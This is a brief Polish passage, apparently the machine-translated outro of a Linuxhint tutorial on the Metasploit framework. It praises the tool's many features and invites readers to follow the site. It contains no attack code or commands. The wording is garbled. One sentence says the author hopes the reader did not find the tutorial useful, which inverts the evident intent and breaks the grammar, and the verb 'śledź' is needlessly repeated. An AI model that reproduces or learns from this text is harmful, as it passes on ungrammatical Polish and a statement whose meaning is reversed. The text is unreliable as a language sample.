Metasploit jest jak szwajcarski nóż armii, ma tak wiele funkcji. Mam nadzieję, że ten samouczek nie znalazłeś przydatnego metasploit. Śledź śledź Linuxhint, aby uzyskać więcej wskazówek i aktualizacji na temat Linux i sieci.